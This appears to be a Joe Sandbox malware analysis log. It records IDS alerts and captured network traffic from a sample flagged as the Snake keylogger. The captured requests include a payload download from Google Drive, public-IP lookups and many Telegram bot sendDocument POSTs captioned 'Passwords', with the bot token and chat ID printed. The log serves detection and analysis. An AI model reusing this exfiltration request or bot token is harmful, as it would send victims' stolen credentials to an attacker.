            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:49766 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:49778 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.10:49766 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.10:49778 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.10:49738 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:49764 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.10:49764 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:49742 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.10:49742 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:49770 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:49782 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:49748 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.10:49770 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.10:49782 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.10:49748 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:49756 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.10:49756 -> 149.154.167.220:443
            Uses the Telegram API (likely for C&C communication)
            Source: unknownDNS query: name: api.telegram.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31ba864dec1bHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31feab93e593Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd322ad5683121Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd327b8ca4e039Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd329c1e4798fcHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32f4decf3f7aHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd336aba261bebHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3397358e49f3Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd33b140535537Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd33c89ef7f87dHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd33e3cef7ff2fHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd33fd9dff96dbHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd341dc0addca8Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd343c81d2ea8cHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd345f0111b6e8Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd348169074dc8Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd34a782720438Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd34d1471b6fa1Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd34f9a68ce3e0Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3526ec8c239eHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd357d60fe315aHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd35b450780516Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd35f180510c0bHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3633a7f99f46Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd369e576146ceHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd36efca5c9cbaHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3759920c3fb5Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd37c46c893414Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3847c2e14721Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd38c1b36f23eaHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd393cc0358b5dHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd39b997d3f58bHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3a0842782977Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3a8a4b2b1383Host: api.telegram.orgContent-Length: 1090
            Source: Joe Sandbox ViewIP Address: 132.226.8.169 132.226.8.169
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49713 -> 132.226.8.169:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49727 -> 132.226.8.169:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49710 -> 132.226.8.169:80
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.10:49708 -> 142.250.181.238:443
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1vX5-dVBAQIFbZDndDazNJs-9Am6tnDXt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1vX5-dVBAQIFbZDndDazNJs-9Am6tnDXt&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.10:49711 version: TLS 1.0
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1vX5-dVBAQIFbZDndDazNJs-9Am6tnDXt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1vX5-dVBAQIFbZDndDazNJs-9Am6tnDXt&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
